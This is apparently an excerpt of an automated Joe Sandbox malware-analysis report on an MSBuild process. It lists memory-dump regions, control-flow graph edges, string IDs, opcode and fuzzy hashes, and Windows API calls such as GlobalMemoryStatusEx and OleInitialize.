                                                                                                                                • Source File: 00000007.00000002.3314117138.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_3200000_MSBuild.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: !3$!3$\V]o$\V]o
                                                                                                                                • API String ID: 0-3904426955
                                                                                                                                • Opcode ID: 97b4d2d7d8f04afd1210183ee7ff8fc939afcedb17fe98ca221ec42a7e18ea8e
                                                                                                                                • Instruction ID: d07bcd58bfaa8a6a1d978ccae34445bd577225dab0860304f7a595ad1749204f
                                                                                                                                • Opcode Fuzzy Hash: 97b4d2d7d8f04afd1210183ee7ff8fc939afcedb17fe98ca221ec42a7e18ea8e
                                                                                                                                • Instruction Fuzzy Hash: 95718B70E10249CFDB10DFAAD98579EBBF2BF88304F18C529E514A7294DB749889CF91
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 706 320416c-3204170 707 3204172-32041de 706->707 708 32040f7 706->708 720 32041e0-32041eb 707->720 721 3204228-320422a 707->721 710 3204107-320410b 708->710 711 32040f9-32040fd 708->711 712 320411b-320411f 710->712 713 320410d-3204111 710->713 711->710 714 32040ff-3204102 call 3200ab8 711->714 717 3204121-3204125 712->717 718 320412f 712->718 713->712 716 3204113 713->716 714->710 716->712 717->718 722 3204127 717->722 718->706 720->721 723 32041ed-32041f9 720->723 724 320422c-3204245 721->724 722->718 725 32041fb-3204205 723->725 726 320421c-3204226 723->726 731 3204291-3204293 724->731 732 3204247-3204253 724->732 727 3204207 725->727 728 3204209-3204218 725->728 726->724 727->728 728->728 730 320421a 728->730 730->726 733 3204295-32042ed 731->733 732->731 734 3204255-3204261 732->734 743 3204337-3204339 733->743 744 32042ef-32042fa 733->744 735 3204263-320426d 734->735 736 3204284-320428f 734->736 738 3204271-3204280 735->738 739 320426f 735->739 736->733 738->738 740 3204282 738->740 739->738 740->736 746 320433b-3204353 743->746 744->743 745 32042fc-3204308 744->745 747 320430a-3204314 745->747 748 320432b-3204335 745->748 752 3204355-3204360 746->752 753 320439d-320439f 746->753 750 3204316 747->750 751 3204318-3204327 747->751 748->746 750->751 751->751 754 3204329 751->754 752->753 756 3204362-320436e 752->756 755 32043a1-32043b3 753->755 754->748 763 32043ba-32043f2 755->763 757 3204370-320437a 756->757 758 3204391-320439b 756->758 759 320437c 757->759 760 320437e-320438d 757->760 758->755 759->760 760->760 762 320438f 760->762 762->758 764 32043f8-3204406 763->764 765 3204408-320440e 764->765 766 320440f-320446f 764->766 765->766 773 3204471-3204475 766->773 774 320447f-3204483 766->774 773->774 777 3204477 773->777 775 3204493-3204497 774->775 776 3204485-3204489 774->776 779 32044a7-32044ab 775->779 780 3204499-320449d 775->780 776->775 778 320448b 776->778 777->774 778->775 782 32044bb-32044bf 779->782 783 32044ad-32044b1 779->783 780->779 781 320449f-32044a2 call 3200ab8 780->781 781->779 786 32044c1-32044c5 782->786 787 32044cf-32044d3 782->787 783->782 785 32044b3-32044b6 call 3200ab8 783->785 785->782 786->787 791 32044c7-32044ca call 3200ab8 786->791 788 32044e3-32044e7 787->788 789 32044d5-32044d9 787->789 793 32044f7 788->793 794 32044e9-32044ed 788->794 789->788 792 32044db 789->792 791->787 792->788 797 32044f8 793->797 794->793 796 32044ef 794->796 796->793 797->797
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3314117138.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_3200000_MSBuild.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: !3$!3$\V]o
                                                                                                                                • API String ID: 0-3066536677
                                                                                                                                • Opcode ID: 3dd318be19e9a2430e9dfa9e59c2f42984536020ae165230118de4990ee0dde6
                                                                                                                                • Instruction ID: 64cdcd88691cbb4f49e7edec8cc97ec8b44047a6066e3fef70f5de689c91c1ee
                                                                                                                                • Opcode Fuzzy Hash: 3dd318be19e9a2430e9dfa9e59c2f42984536020ae165230118de4990ee0dde6
                                                                                                                                • Instruction Fuzzy Hash: EFC14D70E1020ADFDB10DFAAC98579DFBF2AF48314F18C129D915A7295EB749889CF41
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1024 3203e24-3203e96 1027 3203ee0-3203ee2 1024->1027 1028 3203e98-3203ea3 1024->1028 1029 3203ee4-3203f3c 1027->1029 1028->1027 1030 3203ea5-3203eb1 1028->1030 1039 3203f86-3203f88 1029->1039 1040 3203f3e-3203f49 1029->1040 1031 3203eb3-3203ebd 1030->1031 1032 3203ed4-3203ede 1030->1032 1033 3203ec1-3203ed0 1031->1033 1034 3203ebf 1031->1034 1032->1029 1033->1033 1036 3203ed2 1033->1036 1034->1033 1036->1032 1041 3203f8a-3203fa2 1039->1041 1040->1039 1042 3203f4b-3203f57 1040->1042 1049 3203fa4-3203faf 1041->1049 1050 3203fec-3203fee 1041->1050 1043 3203f59-3203f63 1042->1043 1044 3203f7a-3203f84 1042->1044 1046 3203f65 1043->1046 1047 3203f67-3203f76 1043->1047 1044->1041 1046->1047 1047->1047 1048 3203f78 1047->1048 1048->1044 1049->1050 1052 3203fb1-3203fbd 1049->1052 1051 3203ff0-3204002 1050->1051 1059 3204009-320403e 1051->1059 1053 3203fe0-3203fea 1052->1053 1054 3203fbf-3203fc9 1052->1054 1053->1051 1055 3203fcb 1054->1055 1056 3203fcd-3203fdc 1054->1056 1055->1056 1056->1056 1058 3203fde 1056->1058 1058->1053 1060 3204044-3204052 1059->1060 1061 3204054-320405a 1060->1061 1062 320405b-32040bb 1060->1062 1061->1062 1069 32040cb-32040cf 1062->1069 1070 32040bd-32040c1 1062->1070 1072 32040d1-32040d5 1069->1072 1073 32040df-32040e3 1069->1073 1070->1069 1071 32040c3 1070->1071 1071->1069 1072->1073 1074 32040d7-32040da call 3200ab8 1072->1074 1075 32040f3 1073->1075 1076 32040e5-32040e9 1073->1076 1074->1073 1079 32040f7 1075->1079 1076->1075 1078 32040eb-32040ee call 3200ab8 1076->1078 1078->1075 1081 3204107-320410b 1079->1081 1082 32040f9-32040fd 1079->1082 1083 320411b-320411f 1081->1083 1084 320410d-3204111 1081->1084 1082->1081 1085 32040ff-3204102 call 3200ab8 1082->1085 1088 3204121-3204125 1083->1088 1089 320412f-3204170 1083->1089 1084->1083 1087 3204113 1084->1087 1085->1081 1087->1083 1088->1089 1090 3204127 1088->1090 1089->1079 1092 3204172-32041de 1089->1092 1090->1089 1095 32041e0-32041eb 1092->1095 1096 3204228-320422a 1092->1096 1095->1096 1097 32041ed-32041f9 1095->1097 1098 320422c-3204245 1096->1098 1099 32041fb-3204205 1097->1099 1100 320421c-3204226 1097->1100 1105 3204291-3204293 1098->1105 1106 3204247-3204253 1098->1106 1101 3204207 1099->1101 1102 3204209-3204218 1099->1102 1100->1098 1101->1102 1102->1102 1104 320421a 1102->1104 1104->1100 1107 3204295-32042ed 1105->1107 1106->1105 1108 3204255-3204261 1106->1108 1117 3204337-3204339 1107->1117 1118 32042ef-32042fa 1107->1118 1109 3204263-320426d 1108->1109 1110 3204284-320428f 1108->1110 1112 3204271-3204280 1109->1112 1113 320426f 1109->1113 1110->1107 1112->1112 1114 3204282 1112->1114 1113->1112 1114->1110 1120 320433b-3204353 1117->1120 1118->1117 1119 32042fc-3204308 1118->1119 1121 320430a-3204314 1119->1121 1122 320432b-3204335 1119->1122 1126 3204355-3204360 1120->1126 1127 320439d-320439f 1120->1127 1124 3204316 1121->1124 1125 3204318-3204327 1121->1125 1122->1120 1124->1125 1125->1125 1128 3204329 1125->1128 1126->1127 1130 3204362-320436e 1126->1130 1129 32043a1-32043b3 1127->1129 1128->1122 1137 32043ba-32043f2 1129->1137 1131 3204370-320437a 1130->1131 1132 3204391-320439b 1130->1132 1133 320437c 1131->1133 1134 320437e-320438d 1131->1134 1132->1129 1133->1134 1134->1134 1136 320438f 1134->1136 1136->1132 1138 32043f8-3204406 1137->1138 1139 3204408-320440e 1138->1139 1140 320440f-320446f 1138->1140 1139->1140 1147 3204471-3204475 1140->1147 1148 320447f-3204483 1140->1148 1147->1148 1151 3204477 1147->1151 1149 3204493-3204497 1148->1149 1150 3204485-3204489 1148->1150 1153 32044a7-32044ab 1149->1153 1154 3204499-320449d 1149->1154 1150->1149 1152 320448b 1150->1152 1151->1148 1152->1149 1156 32044bb-32044bf 1153->1156 1157 32044ad-32044b1 1153->1157 1154->1153 1155 320449f-32044a2 call 3200ab8 1154->1155 1155->1153 1160 32044c1-32044c5 1156->1160 1161 32044cf-32044d3 1156->1161 1157->1156 1159 32044b3-32044b6 call 3200ab8 1157->1159 1159->1156 1160->1161 1165 32044c7-32044ca call 3200ab8 1160->1165 1162 32044e3-32044e7 1161->1162 1163 32044d5-32044d9 1161->1163 1167 32044f7 1162->1167 1168 32044e9-32044ed 1162->1168 1163->1162 1166 32044db 1163->1166 1165->1161 1166->1162 1171 32044f8 1167->1171 1168->1167 1170 32044ef 1168->1170 1170->1167 1171->1171
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3314117138.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_3200000_MSBuild.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: !3$!3$\V]o
                                                                                                                                • API String ID: 0-3066536677
                                                                                                                                • Opcode ID: 7c492a491d0db46cac08f21e74584d830582d169066f31532c956fe62165be46
                                                                                                                                • Instruction ID: 41989fe6fba29883ad4ea51a319b421f28663222900082c22fef9abd0a2febb0
                                                                                                                                • Opcode Fuzzy Hash: 7c492a491d0db46cac08f21e74584d830582d169066f31532c956fe62165be46
                                                                                                                                • Instruction Fuzzy Hash: 6C917E70E1020ADFDF14DFA9C98579DFBF2AF48304F188129E515A7295EB749889CF81
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1272 66de0d8-66de0e3 1273 66de10d-66de125 call 66dd4b8 1272->1273 1274 66de0e5-66de10c call 66dd4ac 1272->1274 1279 66de12a-66de12c 1273->1279 1280 66de12e-66de131 1279->1280 1281 66de132-66de17c 1279->1281 1281->1279 1286 66de17e-66de191 1281->1286 1288 66de197-66de224 GlobalMemoryStatusEx 1286->1288 1289 66de193-66de196 1286->1289 1292 66de22d-66de255 1288->1292 1293 66de226-66de22c 1288->1293 1293->1292
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3354407052.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_66d0000_MSBuild.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: !3
                                                                                                                                • API String ID: 0-668682336
                                                                                                                                • Opcode ID: 7db3d23b4126cfb6c29d0bd63c7aa883db1a949cc918b8b3e6f3fc76c877d826
                                                                                                                                • Instruction ID: c31d31bac888f42791a1863feac286a95a194e07890dcbb57215aa0432e68c3a
                                                                                                                                • Opcode Fuzzy Hash: 7db3d23b4126cfb6c29d0bd63c7aa883db1a949cc918b8b3e6f3fc76c877d826
                                                                                                                                • Instruction Fuzzy Hash: 3A41EF71E043999FCB14DFA9D8046EABFB1AF89210F1585AAD408A7351DB38A845CBE1
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1296 6f30c70-6f30cac 1297 6f30cb2-6f30cb7 1296->1297 1298 6f30d5c-6f30d7c 1296->1298 1300 6f30d0a-6f30d42 CallWindowProcW 1297->1300 1301 6f30cb9-6f30cf0 1297->1301 1304 6f30d7f-6f30d8c 1298->1304 1302 6f30d44-6f30d4a 1300->1302 1303 6f30d4b-6f30d5a 1300->1303 1307 6f30cf2-6f30cf8 1301->1307 1308 6f30cf9-6f30d08 1301->1308 1302->1303 1303->1304 1307->1308 1308->1304
                                                                                                                                APIs
                                                                                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 06F30D31
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3356555829.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_6f30000_MSBuild.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CallProcWindow
                                                                                                                                • String ID: !3
                                                                                                                                • API String ID: 2714655100-668682336
                                                                                                                                • Opcode ID: a719328890e08302aacb617af73bd1151169a599c408d6c9fea6f87f3518287f
                                                                                                                                • Instruction ID: e8650618f0aafa5fa0d99e2d02a3808bc7a2cc6b35a15d3f7b9145bbbd298ee7
                                                                                                                                • Opcode Fuzzy Hash: a719328890e08302aacb617af73bd1151169a599c408d6c9fea6f87f3518287f
                                                                                                                                • Instruction Fuzzy Hash: 7F4129B5900359CFDB54CF99C848AAABBF5FF88314F24C459D519AB321DB34A841CFA0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1311 6f332e0-6f332e5 1313 6f332e7 1311->1313 1314 6f332b9-6f332c9 1311->1314 1317 6f332e8-6f3334a OleInitialize 1313->1317 1315 6f332d3-6f332d7 1314->1315 1316 6f332cb-6f332d2 1314->1316 1318 6f33353-6f33370 1317->1318 1319 6f3334c-6f33352 1317->1319 1319->1318
                                                                                                                                APIs
                                                                                                                                • OleInitialize.OLE32(00000000), ref: 06F3333D
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3356555829.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_6f30000_MSBuild.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Initialize
                                                                                                                                • String ID: !3
                                                                                                                                • API String ID: 2538663250-668682336
                                                                                                                                • Opcode ID: 829f582e6a2b502eb5fc2e21ce6193f68dc7962a2c9799dcfa6ab2f5df140ce3
                                                                                                                                • Instruction ID: f8d2fd1278454051ad3740b7e88a6b697dd90a8baf9f62d404a6df5101a246f7
                                                                                                                                • Opcode Fuzzy Hash: 829f582e6a2b502eb5fc2e21ce6193f68dc7962a2c9799dcfa6ab2f5df140ce3
                                                                                                                                • Instruction Fuzzy Hash: 50218C71C003888FCB60DFAAD8497DEBFF4EB09320F148559E558A7250C739A940CBE1
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1322 66dd4b8-66de224 GlobalMemoryStatusEx 1325 66de22d-66de255 1322->1325 1326 66de226-66de22c 1322->1326 1326->1325
                                                                                                                                APIs
                                                                                                                                • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,066DE12A), ref: 066DE217
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3354407052.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_66d0000_MSBuild.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: GlobalMemoryStatus
                                                                                                                                • String ID: !3
                                                                                                                                • API String ID: 1890195054-668682336
                                                                                                                                • Opcode ID: ebee4bdda0df2e8f00d14b4af36ca80bb6967230a76a54b8f39ff4cc02452df1
                                                                                                                                • Instruction ID: 04dcd4c45a9137f0d2ac16a7efb28507fdb90c6fd9c5a06d48324aacd53c7771
                                                                                                                                • Opcode Fuzzy Hash: ebee4bdda0df2e8f00d14b4af36ca80bb6967230a76a54b8f39ff4cc02452df1
                                                                                                                                • Instruction Fuzzy Hash: D41112B1C0065A9BCB10DF9AD544BAEFBF4EF48324F10816AE818A7240D779A950CFE5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1329 66de1a8-66de1ee 1330 66de1f6-66de224 GlobalMemoryStatusEx 1329->1330 1331 66de22d-66de255 1330->1331 1332 66de226-66de22c 1330->1332 1332->1331
                                                                                                                                APIs
                                                                                                                                • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,066DE12A), ref: 066DE217
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3354407052.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_66d0000_MSBuild.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: GlobalMemoryStatus
                                                                                                                                • String ID: !3
                                                                                                                                • API String ID: 1890195054-668682336
                                                                                                                                • Opcode ID: f34b22b3937778c1f53175ff0c523d5bfbb384866cb140c577a840d3cd868608
                                                                                                                                • Instruction ID: 016de90c106e6b04c6b61d2711c3267bc2047727246119ae3bb52ec22322a7ff
                                                                                                                                • Opcode Fuzzy Hash: f34b22b3937778c1f53175ff0c523d5bfbb384866cb140c577a840d3cd868608
                                                                                                                                • Instruction Fuzzy Hash: EF1114B1C0065A9FCB10DF9AD544BDEFBF4AF48314F14816AE818A7341D779A944CFA1
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1335 6f323f0-6f3334a OleInitialize 1337 6f33353-6f33370 1335->1337 1338 6f3334c-6f33352 1335->1338 1338->1337
                                                                                                                                APIs
                                                                                                                                • OleInitialize.OLE32(00000000), ref: 06F3333D
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3356555829.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_6f30000_MSBuild.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Initialize
                                                                                                                                • String ID: !3
                                                                                                                                • API String ID: 2538663250-668682336
                                                                                                                                • Opcode ID: 1292c74ccd302d12ce4bbcf3462076c561036917b57eaccdf99796ebd6d4fc77
                                                                                                                                • Instruction ID: 53b59b0f79de0e3bb330dafdd090c5aef46d323c17b102e1ebb8e7c947dd4c60
                                                                                                                                • Opcode Fuzzy Hash: 1292c74ccd302d12ce4bbcf3462076c561036917b57eaccdf99796ebd6d4fc77
                                                                                                                                • Instruction Fuzzy Hash: 611115B5C003488FDB20DF9AD549B9EBBF8EB48320F108459D559A7310C779A944CFE5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3314117138.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_3200000_MSBuild.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: !3$!3
                                                                                                                                • API String ID: 0-1855679173
                                                                                                                                • Opcode ID: d18e2da333b3fb88e513b0448df401b6a30e2ee259550f70e62cda69e85a8d45
                                                                                                                                • Instruction ID: 16a3a1c5a84152cea2fe92c92ac3e558c7cd9d269b834fbfff48cbd858b84e59
                                                                                                                                • Opcode Fuzzy Hash: d18e2da333b3fb88e513b0448df401b6a30e2ee259550f70e62cda69e85a8d45
                                                                                                                                • Instruction Fuzzy Hash: B2A19070E1020ADFDB10DFA9D98179DBBF1AF88314F18C129D914AB295EB749889CF81
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3314117138.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_3200000_MSBuild.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: LR]q$LR]q
                                                                                                                                • API String ID: 0-3917262905
                                                                                                                                • Opcode ID: 8286a4d57ced3b00a08eee26f14521431e332881a056c0a1ebab5ce92c63ec7f
                                                                                                                                • Instruction ID: 1dec0c48ca66abfa32378e4c8b4dbc016e118f0dc15412640f5f8c9e9661dd63
                                                                                                                                • Opcode Fuzzy Hash: 8286a4d57ced3b00a08eee26f14521431e332881a056c0a1ebab5ce92c63ec7f
                                                                                                                                • Instruction Fuzzy Hash: E151C430B1020A8FDB15DF78C45479EBBB6EF85700F14856AE406EB291EB75EC8ACB51
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3314117138.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_3200000_MSBuild.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: !3$!3
                                                                                                                                • API String ID: 0-1855679173
                                                                                                                                • Opcode ID: a2116bc05064735637aa941f4eea34f18788eb1ae74e1e985b8ad18ba820e612
                                                                                                                                • Instruction ID: 47e8f50e8604c7ebd7208a0c8e89b9e4f8df49a30515e3b36e46df93bc1b8900
                                                                                                                                • Opcode Fuzzy Hash: a2116bc05064735637aa941f4eea34f18788eb1ae74e1e985b8ad18ba820e612
                                                                                                                                • Instruction Fuzzy Hash: 6D510474D102198FDB18CFA9C885B9DFBB5FF48304F148119E829BB391DB74A888CB95
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3314117138.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_3200000_MSBuild.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: !3$!3
                                                                                                                                • API String ID: 0-1855679173
                                                                                                                                • Opcode ID: 7a021cb1619eeb34d079b500cac838c8afb1656ed5664d7264090038962e0c7e
                                                                                                                                • Instruction ID: b49187792cfb4b24e23e653467fba7085f951eeab444c4f86b947d1b30bc66fc
                                                                                                                                • Opcode Fuzzy Hash: 7a021cb1619eeb34d079b500cac838c8afb1656ed5664d7264090038962e0c7e
                                                                                                                                • Instruction Fuzzy Hash: 74510374D102198FDB18CFA9C845B9DFBB5FF48304F188119E819BB391DB74A888CB95
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3314117138.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_3200000_MSBuild.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: PH]q
                                                                                                                                • API String ID: 0-3168235125
                                                                                                                                • Opcode ID: 318fc030ac513d05bd5551201afed4d777ce8026b95427aad4a7c57cba1fd2d8
                                                                                                                                • Instruction ID: 46e98ab913d6e56958d2e07c533625c158e787be6555eb706a973eeee7dc43c9
                                                                                                                                • Opcode Fuzzy Hash: 318fc030ac513d05bd5551201afed4d777ce8026b95427aad4a7c57cba1fd2d8
                                                                                                                                • Instruction Fuzzy Hash: 63310E30B002029FCB29DB34D65466E7BE6EF85654F184468D806DB396DF74DC8AC791
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3314117138.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_3200000_MSBuild.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: PH]q
                                                                                                                                • API String ID: 0-3168235125
                                                                                                                                • Opcode ID: a7ed358da410a1f5d8ccc72bf51d32d5acd8f8173a4a940b28e3da2ec21c8b85
                                                                                                                                • Instruction ID: 140879371ed55692d15f882f34988fcb8ff0d1b194def27daa1f030dae01ba9d
                                                                                                                                • Opcode Fuzzy Hash: a7ed358da410a1f5d8ccc72bf51d32d5acd8f8173a4a940b28e3da2ec21c8b85
                                                                                                                                • Instruction Fuzzy Hash: 49312130B002029FCB29EB34E25466E77E6AF84650F144478D806DB39ADE34DC8AC791
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3314117138.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_3200000_MSBuild.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: LR]q
                                                                                                                                • API String ID: 0-3081347316
                                                                                                                                • Opcode ID: 919b267116be0d0ac5f7423d4daf0a9cea0ac7d20bc258724bea68d52e8d63f8
                                                                                                                                • Instruction ID: ed61c7649db0ace3cb5a04fd4875825ab67742f8b98882581efcd11123c5096d
                                                                                                                                • Opcode Fuzzy Hash: 919b267116be0d0ac5f7423d4daf0a9cea0ac7d20bc258724bea68d52e8d63f8
                                                                                                                                • Instruction Fuzzy Hash: F9318F30E2020ACBDB14CFA8C5547AEBBB6FF85304F148569E406E7281DB75E985CB51
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3314117138.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_3200000_MSBuild.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: !3
                                                                                                                                • API String ID: 0-668682336
                                                                                                                                • Opcode ID: 43ed23d9bd5db3b4f472fe05cb0a4d7ce6e58c944576fb8ba54a697d8d96a5ad
                                                                                                                                • Instruction ID: c2621800b33ade1ff2126763821662db789c3d8145d683e1691061c302781a66
                                                                                                                                • Opcode Fuzzy Hash: 43ed23d9bd5db3b4f472fe05cb0a4d7ce6e58c944576fb8ba54a697d8d96a5ad
                                                                                                                                • Instruction Fuzzy Hash: A341F3B0D00349DFCB10DF99C584ADEBFB5FF48304F14841AE819AB264DB75A989CB90
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3314117138.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_3200000_MSBuild.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: !3
                                                                                                                                • API String ID: 0-668682336
                                                                                                                                • Opcode ID: 16ee4146ca814364495b644bd80da2c0c9ac6489923c87fcc6b9476dcb336863
                                                                                                                                • Instruction ID: 02b921520ac6f3c8632e3a2d618a0fcf2c8dbc689acccb07dcfc2a2fe6d1b621
                                                                                                                                • Opcode Fuzzy Hash: 16ee4146ca814364495b644bd80da2c0c9ac6489923c87fcc6b9476dcb336863
                                                                                                                                • Instruction Fuzzy Hash: AB41E2B0D00349DFDB10DF99C584ADEBFB5FF48310F14842AE819AB254DB75A989CB90
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3314117138.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_3200000_MSBuild.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
